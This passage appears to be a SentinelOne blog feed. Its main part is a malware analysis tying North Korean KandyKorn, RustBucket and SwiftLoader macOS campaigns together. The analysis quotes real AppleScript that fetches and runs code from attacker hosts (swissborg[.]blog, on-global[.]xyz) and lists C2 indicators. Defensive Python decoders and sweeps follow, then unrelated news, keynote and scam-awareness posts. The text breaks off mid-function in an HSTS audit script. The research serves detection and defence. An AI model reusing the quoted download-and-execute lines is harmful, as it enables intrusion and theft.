Interesting among these is 26ec4630b4d1116e131c8e2002e9a3ec7494a5cf, which is written to /Users/Shared/.pld, a point we will return to below.

Recent RustBucket activity

In what at first sight appears to be an entirely different campaign, North Korean threat actors are running an ongoing and evolving operation, first disclosed by JAMF, dubbed RustBucket. This campaign initially involved a first stage AppleScript applet and a Swift-based application bundle called ‘Internal PDF Viewer.app’, which used specially crafted PDFs to unlock code for downloading a Rust-based payload.

A number of RustBucket variants have since been sighted. Additionally, several variations of the Swift-based stager, collectively dubbed SwiftLoader, have come to light over the last few months.

While some of these continued to be distributed with the name “Internal PDF Viewer”, in June researchers spotted a variant called SecurePDF Viewer.app. This application was signed and notarized by Apple (since revoked) by a developer with the name “BBQ BAZAAR PRIVATE LIMITED (7L2UQTVP6F)”. SecurePDF Viewer.app requires at least macOS 12.6 (Monterey) and has the bundle identifier com.softwaredev.swift-ui-test. It is capable of running on both Intel and Apple silicon devices.

The main executable uses curl to reach out to docs-send.online/getBalance/usdt/ethereum. This retrieves a file called /gatewindow/1027/shared/ (c806c7006950dea6c20d3d2800fe46d9350266b6), an AppleScript script that when executed posts the filepath of the executing process to a remote server hosted on swissborg.blog.

set sdf to (POSIX path of (path to me))
-- POST the script's own POSIX path as JSON; the response is then run as AppleScript
set aaas to do shell script "curl -H \"Content-Type:application/json\" -d '{\"zip\":\"" & sdf & "\"}' https[:]//swissborg[.]blog/tx/10299301992/hash"
--display dialog aaas
run script aaas
--display dialog "Can 't open this file. The file maybe damaged."

Connection to ObjCShellz

The swissborg.blog domain contacted by SecurePDF Viewer was previously mentioned by JAMF in an article in early November.

JAMF researchers described what appeared to them as a late stage RustBucket payload distributed as a Mach-O binary called ProcessRequest. The researchers dubbed the malware ObjCShellz, in light of the fact that the code was written in Objective-C and functions to execute simple shell commands from a remote C2 via the system() function invoking sh -c.

Our research shows that ObjCShellz is highly likely a later stage of the SwiftLoader SecurePDF Viewer.app.

SwiftLoader Connection to KandyKorn RAT

Other versions of SwiftLoader have been spotted in the wild, including one distributed in a lure called Crypto-assets and their risks for financial stability[.]app[.]zip.

This application is also signed and notarized by Apple (since revoked) by a developer with the name “Northwest Tech-Con Systems Ltd (2C4CB2P247)”. The bundle identifier is com.EdoneViewer and the app’s main executable is EdoneViewer.

There are some interesting overlaps between this version of SwiftLoader and the KandyKorn operation.

Our analysis of EdoneViewer shows it contains a hardcoded URL encoded with a single-byte XOR key of 0x40.

Once decoded, we can see the malware reaches out to the domain on-global.xyz and drops a hidden executable at /Users/Shared/.pw.

D%3D", "http[:]//on-global[.]xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D", 
"/users/shared/Crypto-assets and their risks for financial stability.pdf", "/users/shared/.pw"}
do shell script "curl -o \"" & p & "\" " & d & a & "&& open \"" & p & "\"" & "&& 
curl -o " & b & " " & s & a & " -d pw" & "&& chmod 770 " & b & "&& 
/bin/zsh -c \"" & b & " " & s & " &\" &> /dev/null"
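The single-byte XOR obfuscation described above is trivial to undo once the key is known, and just as easy to recover when it is not. The following Python is an added example, not SentinelLabs tooling: the EdoneViewer binary itself is not on the page, so the encoded bytes are constructed here by XOR-ing the page's on-global[.]xyz URL with the reported key 0x40 and padding it with filler bytes. It goes slightly beyond the text by brute-forcing all 256 keys and picking the one that yields a mostly printable buffer containing "http", which is the usual triage shortcut when the key is not yet known.

```python
#!/usr/bin/env python3
"""Decode (and recover the key for) a single-byte-XOR-obscured C2 URL.

Added example, not SentinelLabs tooling. ENCODED is a constructed sample,
not bytes from the real EdoneViewer binary.
"""
import re
import string
from typing import List, Optional

REPORTED_KEY = 0x40  # key the analysis attributes to EdoneViewer

# Constructed sample: the page's (defanged) on-global[.]xyz URL, XOR-ed with
# REPORTED_KEY and surrounded by filler bytes that stand in for binary data.
SAMPLE_URL = "http://on-global[.]xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D"
FILLER = b"\x60" * 8  # 0x60 ^ 0x40 == 0x20 (space), so the filler decodes to whitespace
ENCODED = FILLER + bytes(c ^ REPORTED_KEY for c in SAMPLE_URL.encode()) + FILLER

PRINTABLE = set(string.printable.encode()) - {0x0B, 0x0C}
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")  # URL up to the next whitespace


def xor_decode(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; XOR is its own inverse."""
    return bytes(b ^ key for b in data)


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII; 0.0 for empty input."""
    if not data:
        return 0.0
    return sum(b in PRINTABLE for b in data) / len(data)


def recover_key(data: bytes, marker: bytes = b"http",
                min_ratio: float = 0.9) -> Optional[int]:
    """Brute-force all 256 keys.

    A candidate wins if the decoded buffer contains `marker` and is mostly
    printable; the printable check keeps a stray 4-byte coincidence from
    winning on a large blob. Returns None when nothing qualifies.
    """
    for key in range(256):
        out = xor_decode(data, key)
        if marker in out and printable_ratio(out) >= min_ratio:
            return key
    return None


def extract_urls(data: bytes, key: int) -> List[str]:
    """Decode `data` with `key` and return every http(s) URL in it."""
    decoded = xor_decode(data, key)
    return [m.decode("ascii") for m in URL_RE.findall(decoded)]


if __name__ == "__main__":
    key = recover_key(ENCODED)
    if key is None:
        print("no single-byte key produced a printable URL")
    else:
        print(f"recovered key: {key:#04x}")
        for url in extract_urls(ENCODED, key):
            print("decoded URL:", url)
```

On a real sample you would feed `recover_key` a region of the binary (for example the bytes around a reference the disassembler cannot resolve) rather than the whole file; the printable-ratio threshold is what stops the search from latching onto an accidental "http" in unrelated data.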

We note that the KandyKorn Python script FinderTools reached out for its next stage to malware hosted on the domain tp-globa[.]xyz and that SUGARLOADER dropped hidden files at /Users/Shared/.sld.

The .pw executable, named download.bin on VirusTotal (060a5d189ccf3fc32a758f1e218f814f6ce81744), takes the URL hardcoded in the EdoneViewer binary as a launch argument. Unfortunately, the C2 did not respond with a download on our test, but the file contains a hardcoded reference to /Users/Shared/.pld for the download path.

Recall that we discovered a variant of KANDYKORN RAT with the same file name .pld above (26ec4630b4d1116e131c8e2002e9a3ec7494a5cf). We assess with medium confidence that /Users/Shared/.pld refers to the same .pld KandyKorn RAT given the overlaps in infrastructure, objectives and TTPs noted here and by previously mentioned researchers.

SentinelOne Customers Protected from KandyKorn and RustBucket Malware

SentinelOne Singularity detects and protects against all known components of KandyKorn and RustBucket malware.

Conclusion

Our analysis has established new connections between previous research findings. We note specific shared infrastructure that indicates a link between ObjCShellz payloads and SwiftLoader stagers. We also provide the first clues that RustBucket droppers and KandyKorn payloads are likely being shared as part of the same infection chain.

Our analysis corroborates findings from other researchers that North Korean-linked threat actors’ tendency to reuse shared infrastructure affords us the opportunity to widen our understanding of their activity and discover fresh indicators of compromise. Below we provide a list of indicators we observed and analyzed in this research.

Indicators of Compromise

SUGARLOADER
d28830d87fc71091f003818ef08ff0b723b3f358

HLOADER
43f987c15ae67b1183c4c442dc3b784faf2df090

KANDYKORN RAT
26ec4630b4d1116e131c8e2002e9a3ec7494a5cf
46ac6dc34fc164525e6f7886c8ed5a79654f3fd3
62267b88fa6393bc1f1eeb778e4da6b564b7011e
8d5d214c490eae8f61325839fcc17277e514301e
8f6c52d7e82fbfdead3d66ad8c52b372cc9e8b18
9f97edbc1454ef66d6095f979502d17067215a9d
ac336c5082c2606ab8c3fb023949dfc0db2064d5
c45f514a252632cb3851fe45bed34b175370d594
ce3705baf097cd95f8f696f330372dd00996d29a
e244ff1d8e66558a443610200476f98f653b8519
e68bfa72a4b4289a4cc688e81f9282b1f78ebc1f
e77270ac0ea05496dd5a2fbccba3e24eb9b863d9

ObjCShell
79337ccda23c67f8cfd9f43a6d3cf05fd01d1588

SecurePDF Viewer
a1a8a855f64a6b530f5116a3785a693d78ec09c0
e275deb68cdff336cb4175819a09dbaf0e1b68f6

Crypto-assets and their risks for financial stability.app
09ade0cb777f4a4e0682309a4bc1d0f7d4d7a036
5c93052713f317431bf232a2894658a3a4ebfad9
884cebf1ad0e65f4da60c04bc31f62f796f90d79
be903ded39cbc8332cefd9ebbe7a66d95e9d6522

Downloader
060a5d189ccf3fc32a758f1e218f814f6ce81744

Remotely-hosted AppleScript
3c887ece654ea46b1778d3c7a8a6a7c7c7cfa61c
c806c7006950dea6c20d3d2800fe46d9350266b6

Network Communications

http[:]//docs-send.online/getBalance/usdt/ethereum
https[:]//drive.google[.]com/file/d1KW5nQ8MZccug6Mp4QtKyWLT3HIZzHNIL2
http[:]//on-global[.]xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D
http[:]//tp-globa[.]xyz/OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC
http[:]//swissborg[.]blog/zxcv/bnm

23.254.226[.]90
104.168.214[.]151
142.11.209[.]144
192.119.64[.]43

File paths

/Applications/Discord.app/Contents/MacOS/.log
/Applications/Discord.app/Contents/MacOS/appname
/Library/Caches/com.apple.safari.ck
/tmp/tempXXXXXX
/Users/Shared/.pld
/Users/Shared/.pw
/Users/Shared/.sld
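The file paths and hashes above are most useful when they are actually checked against hosts. The following Python is an added example, not SentinelOne or Elastic tooling, that turns this IoC section into an offline sweep: it looks for the listed file paths, hashes files under the drop locations against the listed SHA1s, and checks for the Stage 3 Discord swap (a .lock, .log, appname or MacOS.tmp file beside the Discord executable). The `root` parameter lets the same checks run against a constructed directory tree, which is how `demo()` exercises them without a real Discord install; the payload bytes and directory layout in `demo()` are constructed, and the only hashes that are real are the ones copied from the list above.

```python
#!/usr/bin/env python3
"""Offline host sweep for the KandyKorn / SwiftLoader indicators above.

Added example, not SentinelOne or Elastic tooling. demo() builds a
constructed fixture tree; nothing in it is real malware.
"""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, Iterable, List, Tuple

# File-path indicators from the IoC section (XXXXXX in the /tmp entry is random).
IOC_PATHS = [
    "/Applications/Discord.app/Contents/MacOS/.log",
    "/Applications/Discord.app/Contents/MacOS/appname",
    "/Library/Caches/com.apple.safari.ck",
    "/tmp/tempXXXXXX",
    "/Users/Shared/.pld",
    "/Users/Shared/.pw",
    "/Users/Shared/.sld",
]

# SHA1 indicators from the IoC section, all families combined.
IOC_SHA1 = {
    "d28830d87fc71091f003818ef08ff0b723b3f358", "43f987c15ae67b1183c4c442dc3b784faf2df090",
    "26ec4630b4d1116e131c8e2002e9a3ec7494a5cf", "46ac6dc34fc164525e6f7886c8ed5a79654f3fd3",
    "62267b88fa6393bc1f1eeb778e4da6b564b7011e", "8d5d214c490eae8f61325839fcc17277e514301e",
    "8f6c52d7e82fbfdead3d66ad8c52b372cc9e8b18", "9f97edbc1454ef66d6095f979502d17067215a9d",
    "ac336c5082c2606ab8c3fb023949dfc0db2064d5", "c45f514a252632cb3851fe45bed34b175370d594",
    "ce3705baf097cd95f8f696f330372dd00996d29a", "e244ff1d8e66558a443610200476f98f653b8519",
    "e68bfa72a4b4289a4cc688e81f9282b1f78ebc1f", "e77270ac0ea05496dd5a2fbccba3e24eb9b863d9",
    "79337ccda23c67f8cfd9f43a6d3cf05fd01d1588", "a1a8a855f64a6b530f5116a3785a693d78ec09c0",
    "e275deb68cdff336cb4175819a09dbaf0e1b68f6", "09ade0cb777f4a4e0682309a4bc1d0f7d4d7a036",
    "5c93052713f317431bf232a2894658a3a4ebfad9", "884cebf1ad0e65f4da60c04bc31f62f796f90d79",
    "be903ded39cbc8332cefd9ebbe7a66d95e9d6522", "060a5d189ccf3fc32a758f1e218f814f6ce81744",
    "3c887ece654ea46b1778d3c7a8a6a7c7c7cfa61c", "c806c7006950dea6c20d3d2800fe46d9350266b6",
}

DISCORD_MACOS = "Applications/Discord.app/Contents/MacOS"
SWAP_ARTIFACTS = (".lock", ".log", "appname", "MacOS.tmp")  # Stage 3 swap leftovers
HASH_DIRS = ("Users/Shared", DISCORD_MACOS, "Library/Caches", "tmp")


def sha1_bytes(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


def sha1_file(path: Path) -> str:
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def check_paths(root: Path) -> List[str]:
    """Return the IoC paths present under root; the /tmp entry is globbed."""
    hits = []
    for ioc in IOC_PATHS:
        pattern = ioc.lstrip("/").replace("XXXXXX", "??????")
        if any(root.glob(pattern)):
            hits.append(ioc)
    return hits


def check_hashes(root: Path, ioc_hashes: Iterable[str] = IOC_SHA1) -> List[Tuple[str, str]]:
    """Hash every regular file below HASH_DIRS and report IoC matches."""
    wanted = set(ioc_hashes)
    matches = []
    for rel in HASH_DIRS:
        for dirpath, _, files in os.walk(root / rel):
            for name in files:
                p = Path(dirpath) / name
                try:
                    if p.is_file() and not p.is_symlink():
                        digest = sha1_file(p)
                        if digest in wanted:
                            matches.append((str(p), digest))
                except OSError:
                    continue  # unreadable or vanished file; keep sweeping
    return matches


def check_discord_swap(root: Path) -> List[str]:
    """Swap artifacts found beside the Discord executable."""
    d = root / DISCORD_MACOS
    return [n for n in SWAP_ARTIFACTS if (d / n).exists()]


def sweep(root="/", ioc_hashes: Iterable[str] = IOC_SHA1) -> Dict[str, list]:
    root = Path(root)
    return {"paths": check_paths(root), "hashes": check_hashes(root, ioc_hashes),
            "discord_swap": check_discord_swap(root)}


DEMO_PAYLOAD = b"constructed sample payload, not real KandyKorn"


def build_demo_tree(base: Path) -> None:
    """Constructed fixture: swapped Discord binary plus a hidden .pld drop."""
    macos = base / DISCORD_MACOS
    macos.mkdir(parents=True)
    (macos / "Discord").write_bytes(b"stand-in for HLOADER")
    (macos / ".lock").write_bytes(b"stand-in for the renamed real Discord")
    (macos / ".log").write_bytes(b"stand-in for SUGARLOADER copy")
    shared = base / "Users/Shared"
    shared.mkdir(parents=True)
    (shared / ".pld").write_bytes(DEMO_PAYLOAD)


def demo() -> Dict[str, list]:
    """Run the sweep against the constructed tree, with the fixture's own hash added."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(Path(tmp))
        return sweep(tmp, IOC_SHA1 | {sha1_bytes(DEMO_PAYLOAD)})


if __name__ == "__main__":
    for section, found in sweep().items():
        print(f"{section}: {found or 'none'}")
```

Run as root on a macOS host to sweep the live paths; a hit in `discord_swap` deserves attention even when no hash matches, because the swap pattern survives recompilation of the payloads while the SHA1s do not.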

The Good, the Bad and the Ugly in Cybersecurity – Week 47

The Good | FTC Launches Series of Proactive Steps to Bolster U.S. Cybersecurity Efforts

Responding to an ever-evolving cyber threat landscape, the Federal Trade Commission (FTC) has unveiled two security initiatives, consolidating efforts to strengthen cyber defense measures and protect U.S. consumers.

Most recently, the FTC’s proactive stance extended into the realm of artificial intelligence (AI). Recognizing the emerging threat of AI-driven fraud and extortion through voice cloning, the FTC this week announced a Voice Cloning Challenge. The challenge is an innovative approach to encouraging new ideas and technologies capable of detecting and mitigating the risks associated with voice cloning and AI manipulation. By fostering collaboration and incentivizing solutions spanning “product, policy, or procedures”, the FTC demonstrates a commitment to staying ahead of technological advancements and safeguarding consumers from emerging and sophisticated cyber threats.

Last week, the FTC proposed a new cyber disclosure rule after a data breach hit a Virginia-based prison. Reports say that Global Tel* Link Corp., a prison communications provider, failed to secure the sensitive information of incarcerated individuals and then neglected to notify all victims post-breach. After the personal information of some 650,000 users was copied into a cloud service, it was left unencrypted with no firewall or access management software. Forensic analysis later revealed that billions of bytes of data were exposed to the attacker, with some making it onto the dark web. Due to a 9-month delay by Global Tel* Link Corp., thousands of inmates were unable to obtain credit freezes and take necessary precautions. The FTC is now requiring such providers and their subsidiaries to create new data security programs focused on minimizing human error, implementing MFA, and notifying all affected users and facilities of future data breaches within 30 days.

The Bad | Rhysida RaaS Claims Responsibility For Cyberattack on British Library

Days before Halloween, the British Library was hit with a major IT outage following a cyberattack, affecting its website, online systems and onsite services. Last Friday, the institution confirmed that it had suffered a ransomware attack and that many of the library’s services continued to be affected.

In a disturbing turn, the Rhysida ransomware gang claimed responsibility for the attack this week and is now auctioning off stolen data from the national library’s systems. The gang is soliciting bids over the course of a week, presenting a low-resolution screenshot of purportedly stolen ID scans as ‘proof’ of stolen data. The FBI and CISA have issued a joint warning about the opportunistic nature of Rhysida’s attacks, which emphasizes the far reach of its Ransomware-as-a-Service (RaaS) model.

Source: Security Affairs

The Rhysida ransomware group was first observed in May 2023, following the emergence of their victim ‘support’ chat portal hosted on Tor. According to the FBI and CISA, the group is focused on “targets of opportunity” across all critical sectors. Their RaaS model allows Rhysida to lease out ransomware tools and infrastructure leading to profit shares being split between the group and any affiliates.

In response to the data leak, the British Library has confirmed the compromise of HR documents and advised users to reset passwords as a precautionary measure. While evidence suggests leaked HR information, the library asserts there is no indication of broader user data compromise so far. To date, the British Library sees more than 11 million visitors to its website annually and over 16,000 users accessing both onsite and digital collections of over 150 million items. The ongoing issues stemming from this attack underline the much-needed defense of critical cultural and national institutions against persistent threat groups targeting organizations of opportunity.

The Ugly | Sensitive PII Leaked Online After U.S. Nuclear Energy Center is Breached

The 5,700-strong workforce of Idaho National Laboratory (INL) fell victim to a cyberattack this week when the contents of their HR database were leaked online. INL is a nuclear research center housing 50 experimental reactors operated by the U.S. Department of Energy. The center holds a vast portfolio, being involved in research on nuclear waste processing, robotics, bioenergy, advanced vehicle testing, light water reactors, and more. This is the latest attack on U.S. critical sectors, a growing trend in which threat actors seek to compromise many through a single entity and leverage sensitive data for exorbitant ransoms.

The breach was claimed by a hacktivist group called ‘SiegedSec’, already known in the cyber threat arena for its previous attacks on NATO and Atlassian, after it gained access to INL servers supporting the research center’s Oracle HCM system. Consistent with its past breaches, SiegedSec took to various hacker forums and its Telegram channel to post stolen data from allegedly “hundreds of thousands” of employees, system users, and citizens.

Source: BleepingComputer

While INL has yet to release an official statement on the incident, a spokesperson has acknowledged the breach, confirming support from federal law enforcement agencies, including the FBI and CISA, and that investigations are underway. Affected employees have been told to freeze their credit, monitor financial accounts, and update critical passwords.

The attack on INL follows similar breaches from earlier this year where a Russian-based hacking group dubbed ‘Cold River’ targeted three American nuclear labs: Brookhaven (BNL), Argonne (ANL), and Lawrence Livermore National Laboratories (LLNL). Though SiegedSec has not disclosed any data related to INL’s nuclear research as of this writing, the incident underscores the heightened concerns around protecting U.S. critical infrastructure and essential services against advancing cyber threats.

The Physics of Information Asymmetry | Juan Andrés Guerrero Saade’s Keynote at VB2023

At this year’s VirusBulletin conference, VB2023, SentinelOne’s Juan Andrés Guerrero Saade, a.k.a. JAGS, Associate Vice President of SentinelLabs delivered a keynote speech calling for a reevaluation of the conventional understanding of the cybersecurity sector. His talk, “The Physics of Information Asymmetry” challenged us to reconsider and reinterpret the fundamental concepts and language of our discipline.

Redefining the Language of Cybersecurity | A Critical Analysis

Juan Andrés opened the talk by critiquing the reliance on military and intelligence metaphors in cybersecurity. This borrowed lexicon, while providing a foundational language in the discipline’s infancy, has, over time, led to a narrowed perspective.

JAGS argued that terms like ‘cyber attack’ and ‘cyber domain’ are rooted in a militaristic worldview and limit our strategic approach to digital defense. Are we, as cybersecurity professionals, constrained by the language we use? How would our strategies change if we broke free from these traditional paradigms?

Decoding Information Asymmetry

A central theme of the keynote was the concept of information asymmetry between attackers and defenders. This imbalance is not merely a tactical disadvantage but a core characteristic that shapes the landscape of cyber conflict.

Juan Andrés elaborated on how this asymmetry transcends mere knowledge gaps and engenders differing perceptions, capabilities, and intents. He challenged the audience to think beyond the conventional ‘cat and mouse’ game and consider the broader implications of this asymmetry. How does it influence our approach to defense? What new strategies could emerge if we fully understood and redefined cybersecurity in terms of information asymmetry?

Rewriting Cybersecurity Metaphors | A Call for Conceptual Revolution

There are no simple solutions when addressing such foundational issues, but the industry can only move forward by rising to the challenge. Juan Andrés advocates for a complete overhaul of the metaphors underpinning cybersecurity. Drawing from diverse fields like physics and information theory, he suggested that adopting new metaphors could lead to more effective and nuanced cybersecurity strategies.

This metaphorical shift isn’t merely semantics but a fundamental rethink of how we conceptualize cyber threats and defenses. What new models and frameworks could we develop if we freed ourselves from the current paradigms?

Leveraging External Expertise | Broadening Our Cybersecurity Horizon

Central to this new approach was the need to tap the potential of integrating insights from adjacent fields into cybersecurity. The industry as it now stands is unusual in being insulated from valuable contributions from related disciplines such as information theory, control theory, complex adaptive systems, and statistics. This is a situation that must change if we are to evolve our practice and knowledge, and ultimately defend organizations more successfully.

An interdisciplinary approach, JAGS suggested, could unlock new perspectives and solutions, propelling our understanding of cybersecurity challenges to new heights. What innovative approaches might emerge from such collaborations? How can insights from these fields enrich our strategies and tools?

Conclusion | Charting a New Course in Cybersecurity

Juan Andrés Guerrero Saade’s keynote at VB2023 offered a compelling perspective on the future of cybersecurity. A thoughtful critique of current practices, it suggested a need for a shift in how we understand and tackle digital threats. The call to integrate ideas from various fields challenges us to think differently about how we conceptualize our discipline and what that means for its accessibility to others.

Black Friday & Cyber Monday | A Guide to Avoiding Cyber Scams During the Holidays

As the virtual doors of e-commerce swing open for a weekend bookended by Black Friday and Cyber Monday deals and discounts, the bustling online market provides many avenues for phishing attacks, email scams, malicious websites, and more. Even vigilant shoppers are more vulnerable during this time of year, as it is an opportune time for credit card fraud and identity theft, which adds another layer of risk.

For businesses, the holiday season means security teams have to step up their vigilance in an effort to counter fraudsters and protect both the business and customers.

This blog post delves into the most common cyber threats that emerge during the holiday rush and provides useful tips to help both shoppers and businesses ensure a safe and secure holiday online experience.

Holiday-Based Threats in the eCommerce Landscape

Ahead of the festive season, authorities are already cautioning eager bargain hunters about the risks that come with shopping online.

The National Cyber Security Centre (NCSC), part of the UK’s intelligence agency, warned that cybercriminals this year may leverage AI technology to create more convincing scam content, malicious adverts, and spoofed websites.

Similarly, the Canadian RCMP have also sent out cybersecurity tips for a safer holiday season, offering ways people can protect their personal and financial information while buying online.

The FBI and CISA this year released a cybersecurity advisory urging businesses to stay vigilant against the spike of ransomware campaigns that occur during holidays and long weekends when offices are usually closed or operating with a leaner workforce. Threat actors continue to leverage widely-celebrated holidays to get a head start on conducting impactful attacks.

Top Scams to Watch Out for This Cyber Week

Cyber Week, the shopping period made up of Thanksgiving, Black Friday, Small Business Saturday, and Cyber Monday, broke eCommerce records last year. On Cyber Monday alone, consumers drove $11.3 billion in online sales, and a whopping $35.3 billion in total for the entire holiday season. According to reports, mobile shopping, buy-now-pay-later incentives, curbside pickup, and discounts in the face of growing global inflation all contributed to the skyrocketing shopping rates.

While online retailers continue to make bank during Cyber Week, businesses and shoppers alike are increasingly impacted by cyber attackers all waiting for the biggest online shopping events of the year. Here are the most commonly used threat tactics and how to guard against them.

Email Scams & Social Engineering

Email phishing scams are a prevalent threat, involving deceptive messages that appear as legitimate promotional offers or urgent notifications. These are designed to trick recipients into revealing sensitive information or tempt them into downloading malware. Social engineering plays a pivotal role, manipulating shoppers to divulge personal details or click on malicious links.

Email scams often involve gift card fraud with scammers coercing victims to purchase gift cards under the guise of resolving issues, subsequently taking off with the funds. Fake order confirmations are also common during the holiday season, often including convincing logos and graphics to trick shoppers into clicking on malicious links thinking they are contacting customer support to dispute the non-existent purchase.

Social media platforms are also breeding grounds for scams during Cyber Week, with fake advertisements, pyramid schemes disguised as gift exchange games, and too-good-to-be-true deals leading users to spoofed websites.

How To Stay Safe

To safeguard against these threats, vigilance and good cyber hygiene are prerequisites:

  • Operate with caution as a default – Verify incoming emails and messages and avoid clicking on suspicious links. Check that the sender’s email address is correct, look for official branding, and be aware of the tone of the message.
  • Don’t rush to respond – Scammers like to send fake confirmations for expensive goods or services, or claim the recipient has been or will be charged for something they never ordered. The ploy is to instill a sense of urgency and encourage the intended victim to click a malicious link. For any unexpected communication that implies some form of payment is due or forthcoming, verify its legitimacy through official channels rather than relying solely on email notifications.
  • Be wary of gift card scams – When confronted with requests for gift card purchases, check the request through a trusted source.
  • Inform and stay informed – Knowledge is power, and in a connected world, we are all part of the solution. Keep up to date with blogs and social media accounts from state and local authorities, which often post warnings when particular scams spike, and share them with others. The more people are aware of scams, the less successful they are.
  • Report suspicious activities – If you think you may have fallen victim to a scam, it’s important both to report it to relevant authorities and organizations such as your employer or your bank and to take action quickly. Reset passwords where necessary and enable multi-factor authentication (MFA).

Spoofed Websites, Malvertising & E-Skimming

Major Cyber Week discounts create a prime hunting ground for threat actors employing sophisticated techniques such as spoofed websites, malvertising, and e-skimming to exploit unsuspecting shoppers.

Spoofed websites mimic legitimate online retailers, leading users to unwittingly share personal and financial information. Malvertising infiltrates legitimate advertising networks, placing malicious ads on seemingly trustworthy websites and compromising the user’s device upon interaction. E-skimming involves the malicious injection of code into online payment forms, enabling cybercriminals to intercept and steal sensitive payment information during transactions.

How To Stay Safe

To shield against these threats:

  • Double-check website URLs – Does that website address look correct? Check for legitimacy, ensuring web addresses match the official domain of the retailer.
  • Ensure a vendor has secure payment methods in place – Don’t enter personal or financial information in web forms that are not clearly secure. Check that the URL of the site is prefixed with “HTTPS” and look for trust seals or security badges, including those from SSL certificate providers and payment processors. Also, reputable online vendors typically offer a variety of secure payment options. Look for familiar and trusted payment methods such as credit cards, PayPal, or other well-known processors.
  • Consider payment options carefully – Use credit cards or pre-paid credit or debit cards to purchase items. Avoid paying by bank transfer as money sent this way is unrecoverable.
  • Block the spam – Install reputable ad blockers to mitigate the risks of malvertising, blocking potentially harmful ads.

Credit Card & Identity Fraud

Threat actors take advantage of the hustle and bustle of the holiday period to steal credit card details and digital identities. Credit card fraud involves the unauthorized use of credit card information for illicit transactions, often through compromised online platforms. Identity fraud, on the other hand, entails the theft of personal information to impersonate individuals for fraudulent activities.

Magecart malware, for example, is a malicious script that infiltrates and compromises eCommerce websites to harvest sensitive information, primarily credit card details and other personal data.

The malware intercepts and captures user input, such as credit card information entered during online transactions, without the knowledge of the website owner or the unsuspecting users. The harvested data is then exfiltrated to remote servers controlled by cybercriminals, who can exploit it for various fraudulent activities, including unauthorized transactions and identity theft.

How to Stay Safe

To protect against credit card and identity fraud:

  • Use secure and reputable payment methods – Prepaid credit cards, gift vouchers or gift cards, PayPal, Apple Pay, Google Pay, or Amazon Pay reduce the need to share bank details directly when making online purchases.
  • Use retailer apps where available – Many reputable retailers have their own apps allowing users to shop and pay directly through the mobile app.
  • Monitor bank statements regularly – Be alert for suspicious transactions and set up transaction alerts that can aid in early detection of unauthorized activity.
  • Be cautious about sharing personal information – Only provide personal information to trusted and verified sources.
  • Implement strong, unique passwords – never reuse passwords and use a password manager to test password strength. Make sure passwords aren’t simple variations on common phrases.
  • Develop situational awareness – Refrain from using public Wi-Fi for financial transactions, or typing sensitive passwords in public places such as cafes, bars and restaurants that may be overlooked by CCTV.

Protecting Online Shoppers | What eRetailers Can Do

As the digital marketplace intensifies during events like Black Friday or Cyber Monday, eCommerce retailers will look to fortify their websites and enhance their cybersecurity posture to ensure the safety of their online shoppers. While security measures are a year-round endeavor, business leaders and security teams can use the following checklist to do a routine check on their systems ahead of the holiday rush.

  • Ensure data security – Robust transport protections, such as Transport Layer Security (TLS), Perfect Forward Secrecy (PFS) and HTTP Strict Transport Security (HSTS), help secure data transmitted between users and the website.
  • Review and respond – Threat actors change tactics frequently and rapidly, and new software bugs are quickly exploited. Regular security audits and vulnerability assessments can identify and patch potential weaknesses in the website’s infrastructure, blocking potential entry points for cyber attackers.
  • Leverage modern defenses – eCommerce businesses should invest in advanced firewalls, intrusion detection systems (IDSs), and monitoring solutions to detect and prevent unauthorized access or malicious activities.
  • ‘Patch early, patch often’ is still good advice – Keeping software, plugins, and third-party integrations up to date is crucial to minimize the risk of exploitation by cyber threats.
  • Develop a culture of awareness – Regular employee training on cybersecurity best practices, including recognizing and avoiding phishing attempts, contributes to a more vigilant workforce.
  • Guard the tradesman’s entrance – Carefully vet and monitor third-party vendors, ensuring that they adhere to strict security standards and are also ready for the holiday season.
  • Prepare for the rush – Ahead of the sales season, load testing and performance monitoring are essential to ensure that the website can handle increased traffic without compromising security.
  • Know how to react – A robust incident response plan (IRP) should also be in place, detailing the mitigation steps and communication plans to be followed in the event of a breach.
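The first item on the checklist above (TLS versions and the HSTS header) is the one a reviewer can check mechanically. The following is an added example, not code from the original post or from SentinelOne: it parses a Strict-Transport-Security header value according to RFC 6797 and checks an nginx-style `ssl_protocols` list, returning findings for a weak configuration and none for a hardened one. The header values and protocol lists are constructed for illustration; the one-year `max-age` floor and the list of deprecated protocol versions are the reviewer's own thresholds, not anything the post states.

```python
"""Offline audit of a web front end's transport-security settings.

Added example (not from the original post). Parses a Strict-Transport-Security
header (RFC 6797) and checks an nginx-style ``ssl_protocols`` value.
All sample headers and protocol lists below are constructed for illustration.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

ONE_YEAR = 365 * 24 * 3600          # 31536000 s, the floor used here for max-age
WEAK_TLS = {"SSLv2", "SSLv3", "TLSv1", "TLSv1.1"}   # deprecated by RFC 8996


@dataclass
class HstsPolicy:
    max_age: Optional[int] = None
    include_subdomains: bool = False
    preload: bool = False
    errors: List[str] = field(default_factory=list)


def parse_hsts(header: Optional[str]) -> HstsPolicy:
    """Parse an STS header value. Directive names are case-insensitive, each
    may appear only once, and max-age is mandatory (RFC 6797 section 6.1)."""
    policy = HstsPolicy()
    if header is None:
        policy.errors.append("no Strict-Transport-Security header")
        return policy
    seen = set()
    for directive in header.split(";"):
        directive = directive.strip()
        if not directive:
            continue
        name, _, value = directive.partition("=")
        name = name.strip().lower()
        value = value.strip().strip('"')      # max-age value may be quoted
        if name in seen:
            policy.errors.append(f"duplicate directive {name}")
            continue
        seen.add(name)
        if name == "max-age":
            if value.isdigit():
                policy.max_age = int(value)
            else:
                policy.errors.append(f"bad max-age value {value!r}")
        elif name == "includesubdomains":
            policy.include_subdomains = True
        elif name == "preload":
            policy.preload = True
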